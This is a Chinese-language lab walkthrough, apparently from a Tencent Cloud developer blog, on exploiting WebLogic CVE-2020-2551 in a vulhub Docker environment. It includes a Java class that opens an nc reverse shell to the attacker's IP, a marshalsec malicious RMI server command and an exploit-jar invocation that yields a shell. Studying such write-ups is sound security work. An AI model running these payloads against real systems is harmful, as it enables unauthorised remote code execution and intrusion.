前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2020-2551

CVE-2020-2551

原创
作者头像
助安社区
修改2023-04-11 18:12:57
3450
修改2023-04-11 18:12:57
举报
文章被收录于专栏:黑客编程黑客编程

前言

2020年1月15日,Oracle发布了一系列的安全补丁,其中Oracle WebLogic Server产品有高危漏洞,漏洞编号CVE-2020-2551,CVSS评分9.8分,漏洞利用难度低,可基于IIOP协议执行远程代码。

经过分析这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。

环境搭建

直接使用vulhub中的CVE-2017-10271就可以

使用git克隆到本地

代码语言:txt
复制
git clone https://github.com/vulhub/vulhub.git
图片
图片

进入对应环境

代码语言:txt
复制
cd vulhub/weblogic/CVE-2017-10271
image-20230107154925407
image-20230107154925407

启动docker漏洞环境

代码语言:txt
复制
sudo docker-compose up -d
image-20230107155739460
image-20230107155739460

搭建完成以后,访问7001/console如下图所示即为搭建成功

image-20230107160549138
image-20230107160549138

检测是否存在漏洞

python3 CVE-2020-2551.py -u http://192.168.52.128:7001/

image-20230107164740702
image-20230107164740702

发现存在漏洞

漏洞利用

攻击机ip:192.168.0.101

靶机ip:192.168.52.128

攻击机开启监听nc -lvnp 3333

image-20230107180523151
image-20230107180523151

编写一个exp.java文件:

代码语言:java
复制
import java.io.IOException;
public class exp {
        static{
                try {
                        java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","nc -e /bin/bash 192.168.0.101 3333"});
                } catch (IOException e) {
                        e.printStackTrace();
                }
        }
        public static void main(String[] args) {

        }
}

其中"nc -e /bin/bash 192.168.52.130 3333"是要执行的命令

然后进行编译,生成出一个exp.class文件

image-20230107171912137
image-20230107171912137
image-20230107171939453
image-20230107171939453

启一个web服务,需要与exp.class在同一文件夹

image-20230107172232631
image-20230107172232631

使用marshalsec起一个恶意的RMI服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.101/#exp" 1099

image-20230107180020082
image-20230107180020082

然后开始进行攻击,使用命令,成功弹出shell:

代码语言:java
复制
java -jar weblogic_CVE_2020_2551.jar 192.168.52.128 7001 rmi://192.168.0.101:1099/exp
image-20230107180754385
image-20230107180754385

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 环境搭建
  • 检测是否存在漏洞
  • 漏洞利用
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档